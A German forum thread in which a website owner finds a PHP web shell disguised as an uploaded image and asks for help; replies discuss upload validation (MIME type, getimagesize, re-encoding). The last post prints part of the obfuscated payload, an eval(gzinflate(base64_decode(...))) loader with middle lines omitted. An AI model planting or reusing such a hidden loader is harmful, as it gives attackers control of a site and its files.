Hilfe, Hacker auf meiner Seite!!!

  • Hallo,
    ich hab eine Internet-Seite auf der man Bilder hochladen kann. Jetzt hat jemand ein Bild hochgeladen, dass man nicht anzeigen kann. Daraufhin hab ich das mal mit dem Texteditor geöffnet und erschrecke mich über den Inhalt:
    <?PHP
    //Authentication
    $login = ""; //Login
    $pass = ""; //Pass
    $md5_pass = ""; //If no pass then hash

    Dann kommt ein langer chaotischer Block aus Buchstaben und Zahlen.
    ?>

    Kann mir jemand sagen was genau dieses Programm macht?
    Muss ich Angst um meine Daten haben?
    Danke!

  • Wie sollte man dazu was sagen können. Das, was wir hier bisher gesehen haben, sind ein paar Zeilen PHP-Code.

  • okay, die nächste Zeile hab ich noch übersehen, es sieht also so aus:
    <?PHP
    //Authentication
    $login = ""; //Login
    $pass = ""; //Pass
    $md5_pass = ""; //If no pass then hash
    eval(gzinflate(base64_decode('HJ3HkqNQEk...das geht dann wirklich immer so weiter, über sehr viele, sehr lange Zeilen, bis schließlich '))) ?> kommt

  • Diese Datei solltest du ganz schnell löschen. Da schiebt dir irgend jemand einen Quellcode unter, den du bestimmt nicht ausgeführt haben möchtest. Obwohl mich persönlich würde es schon interessieren, was die Datei anstellt.

    Du scheinst nicht den Type der Datei zu überprüfen, die da upgeloaded wird.

  • Das denk ich mir auch. Sowas sollte in keinem Fall verbreitet werden.
    Außerdem würd das hier den Rahmen sprengen ;)

    Die einzige Möglichkeit gegen solche Dateien zu schützen, wäre aus meiner Sicht, jedes hochgeladene Bild in .txt umzubenennen, auszulesen(vergleichen) und wieder in .jpg zurück umzubenennen(Sehr umständlich!!)

    Oder kann man die Daten eines Bildes auch so in Textform auslesen?
    Sieht irgendjemand eine andere Möglichkeit, wie man sich vor sowas schützen kann?

  • den Mime-Type kannst du bei Bildern über das $_FILES Array auslesen.
    Das ist zwar auch keine 100%ige Lösung, da diese auch umgangen werden kann, auf jeden Fall würde es das ganze aber absichern.

  • Der MimeType lässt sich auch manipulieren. getimagesize ist die richtige Funktion.

  • Zitat von phpfan

    Nein, bitte nicht alles posten. Damit verführt man nur andere Idioten.

  • wie "leicht" ist es, einen MIME-Type zu fälschen?

    Ich meine, wenn das geht, dann hilft ja getimagesize auch nichtmehr. Versteh ich das jetzt richtig? Oder kann man nur einen MIME-Type VORTÄUSCHEN, getimagesize zeigt aber den richtigen...?


    lg
    Andi

  • Soetwas kann man auch einfach mal ausprobieren!

    Code
    <?
       $data = getimagesize("./bild.jpg");
    
    
       if ($data === false)
         echo "Invalid Image";
       else
         print_r($data);
    ?>
  • Boah, ich hab das Programm jetzt mal als PHP ausgeführt, und was das macht, ist horror! Man kann damit alle möglichen Dateien anzeigen lassen, herunterladen, selber Daten hochladen usw.
    Das ist natürlich ein Schock!
    Als .JPG ausgeführt liefert es mir allerdings nur den Quelltext des Programms selber. Meint ihr, dass jetzt irgendeiner alle meine Daten haben könnte oder denkt ihr, dass es als .JPG nutzlos ist?


    P.S. Danke, hab inzwischen also selber rausgefunden, was dieses Skript macht, und möchte wirklich nicht, dass so ein Mist verbreiet wird. Ich weiß euch könnte ich vertrauen, aber jeder könnte mir ja seine ICQ-Nr. geben, auch Leute denen man sowas auf keinen Fall geben darf. Bitte um Verständnis.

  • Zitat

    Als .JPG ausgeführt liefert es mir allerdings nur den Quelltext des Programms selber. Meint ihr, dass jetzt irgendeiner alle meine Daten haben könnte oder denkt ihr, dass es als .JPG nutzlos ist?


    Es gibt Mittel und Wege, die ich hier nicht näher vebreiten möchte, um das zu umgehen etc., aber die sind nicht allzuleicht.

    Ich würde trozdem sicherheitshalber die wichtigstens Daten (Passwörter o.ä.) ändern, nur um sicher zu gehen =)

    Zitat

    Ich weiß euch könnte ich vertrauen, aber jeder könnte mir ja seine ICQ-Nr. geben, auch Leute denen man sowas auf keinen Fall geben darf. Bitte um Verständnis.


    A1: Danke für das ausgesprochene Vertrauen :D
    A2: Verständnis ist immer gut.
    A3: Wenn ich so ein Script bräuchte, würde ich es selber schreiben :P
    A4: Schön das du das Problem gelöst hast :wink:

  • Zu A3: Ich weiß, dass du so ein Skript nicht brauchst!
    Zu A4: Gelöst ist relativ, ich weiß jetzt nicht ob irgendjemand im Besitz meiner Daten ist, dass wäre echt schlimm!

    Das Passwort hab ich natürlich sofort geändert. Der Access-File gibt nicht viel her, nur dass er auf die Datei zugegriffen hat, aber natürlich nicht, wie lange.
    Sollte ich meinen Hoster informieren? Oder gelte ich dann als Sicherheitsrisiko?
    Und weiß der mehr über den Zugriff meiner Daten?

  • Schick mehr Infos oder besser einen Screenshot der Datei.
    Wenn es sich um einen Shell-Injecter oder Backdoor-Oeffner handelt,
    waere es sehr klug den Hoster zu kontaktieren, da bei unzureichender
    Absicherung hierbei das System kompromittiert werden kann.

    Btw zur Info: es ist moeglich Code zu kompilieren so dass es ein valides JPEG ist, aber trotzdem PHP enthaelt. Ich wuerde nach dem Hochladen den Bildinhalt mit PHP in ein neues Bild kopieren lassen -dann biste den Ballast los :)

  • So, ihr habt es so gewollt. Mach mich bestimmt unbeliebt jetzt, aber das muss ich in Kauf nehmen.
    Dies ist ca. ein Drittel des Codes(in der Mitte fehlen Zeilen im selben Schema)

    <?PHP
    //Authentication
    $login = ""; //Login
    $pass = ""; //Pass
    $md5_pass = ""; //If no pass then hash
    eval(gzinflate(base64_decode('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
    .......
    o3Vf4Ld+UiH/Plpsl7Q0K7Yq1HvBSwCHw3hcJZvJ9DiN6kJd8GXWR8A0g6gN7efyolFZmXJSkfJ4ij9uzIk5Fn0+lSuVovCgr1UW9umOF1rZVfueHA/r9+bW9futJj1ZETFtfo+lljEkrKNphM1vsYofR0nLN
    eISTcx8JB+CzvCtPbkQvCREz20jzOWmhyA7i568zaZRQTLfO1zS9vP34kMfb0ii5c+X5DkZvfWI3aIzo7w2zgBBe0pcyEAwf140DKTG2tU2+VdCzI0EQCSltagkiugrm3k1ctsnnNIyilfDkQNlNND7qml51x
    kiT0d5Mukc17Bfs2DXdUn7Dj5qynymWRcvydcWUwnbOTvD9ABmSDz4AF5FV9omxSL/GO2OYowPCYGfNXBVAg6DPa84jA7JJJ6O+QdUv51FR/1dnx89M8P6H7P1qgSq3fbEqwSKgC2OCB6Gds5T7dJIsm2wrS+
    Y/O19dCsltUVCNIAWIIgeFb//eeff/79z/8A')));
    ?>